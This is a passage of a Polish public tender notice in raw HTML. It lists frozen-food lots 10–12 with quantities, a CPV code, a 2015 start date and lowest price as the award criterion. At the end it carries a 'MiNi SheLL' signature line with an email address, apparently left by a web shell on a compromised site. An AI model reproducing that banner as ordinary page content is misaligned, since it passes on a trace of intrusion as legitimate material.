Paszteciki drożdżowe z kapustą i grzybami zamrożone	kg	150,
Paszteciki drożdżowe z pieczarkami i serem zamrożone	kg	50,
Pyzy ziemniaczane zamrożone	 kg	120,
Kluski śląskie zamrożone 	kg	300,
Kopytka zamrożone	kg	300,
Frytki zamrożone	kg 220.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie 10 - Obszar IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Flaki zamrożone	kg	1 500,
Pierogi z mięsem zamrożone	kg	1 200,
Pierogi z kapustą i grzybami zamrożone	kg	120,
Pierogi z serem zamrożone	kg	1 200,
Knedle owocowe zamrożone	kg	1 200,
Uszka z kapustą i grzybami zamrożone kg	150,
Naleśniki z serem zamrożone	kg 900,
Naleśniki z owocami zamrożone kg	450,
Krokiety z kapustą i grzybami zamrożone	kg	130,
Krokiety z mięsem zamrożone	kg	900,
Pyzy ziemniaczane z mięsem zamrożone	kg	900,
Gołąbki zamrożone kg	600,
Paszteciki drożdżowe z mięsem zamrożone kg	330,
Paszteciki drożdżowe z kapustą i grzybami zamrożone	kg	200,
Paszteciki drożdżowe z pieczarkami i serem zamrożone	kg	700,
Pyzy ziemniaczane zamrożone kg	350,
Kluski śląskie zamrożone 	kg	350,
Kopytka zamrożone	kg	900,
Frytki zamrożone	kg	1 300,
Sznycel wieprzowy zamrożony kg	300,
Sznycel drobiowy zamrożony	kg	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie 11 - Obszar V.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pierogi z mięsem zamrożone	kg	250,
Pierogi z kapustą i grzybami zamrożone	kg	250,
Pierogi z serem zamrożone	kg	200,
Uszka z kapustą i grzybami zamrożone	kg	300,
Krokiety z kapustą i grzybami zamrożone	kg	250,
Krokiety z mięsem zamrożone	kg	350,
Pyzy ziemniaczane z mięsem zamrożone	kg	400,
Gołąbki zamrożone	kg	250,
Paszteciki drożdżowe z mięsem zamrożone	kg	300,
Paszteciki drożdżowe z kapustą i grzybami zamrożone	kg	250,
Paszteciki drożdżowe z pieczarkami i serem zamrożone	kg	300,
Pyzy ziemniaczane zamrożone	 kg	600,
Kluski śląskie zamrożone 	kg	700,
Kopytka zamrożone	kg	600,
Frytki zamrożone	kg	1 200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie 12 - obszar VI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Flaki zamrożone	kg	600,
Pierogi z mięsem zamrożone	kg	720,
Pierogi z kapustą i grzybami zamrożone	kg	950,
Pierogi z serem zamrożone	kg	900,
Knedle owocowe zamrożone	kg	45,
Uszka z kapustą i grzybami zamrożone	kg	410,
Naleśniki z serem zamrożone	kg	520,
Naleśniki z owocami zamrożone	kg	200,
Krokiety z kapustą i grzybami zamrożone	kg	400,
Krokiety z mięsem zamrożone	kg	460,
Pyzy ziemniaczane z mięsem zamrożone	kg	270,
Pyzy ziemniaczane zamrożone	 kg	450,
Kluski śląskie zamrożone 	kg	700,
Kopytka zamrożone	kg	700,
Frytki zamrożone	kg	600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com